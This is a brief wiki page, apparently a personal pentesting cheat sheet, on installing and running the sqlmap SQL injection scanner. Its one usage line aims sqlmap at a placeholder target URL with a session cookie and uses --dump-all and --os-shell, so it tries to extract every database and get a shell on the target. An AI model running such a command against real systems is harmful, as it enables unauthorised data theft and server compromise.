Skip to content
Heath Brown edited this page Apr 30, 2024 · 1 revision

sqlmap

SQL injection scanner

Install

sudo apt install sqlmap -yq

running

sqlmap -u <target_url> --cookie '<cookie info>' -a --dump-all --os-shell
Clone this wiki locally